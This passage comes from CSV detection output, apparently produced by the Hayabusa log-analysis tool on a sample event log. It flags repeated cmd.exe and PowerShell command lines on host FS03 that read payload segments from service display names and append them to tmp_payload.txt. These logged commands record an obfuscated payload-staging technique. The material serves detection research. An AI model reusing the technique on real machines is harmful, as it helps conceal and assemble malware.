c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:46.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:47.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:49.273 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:50.726 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:50.742 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:52.180 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 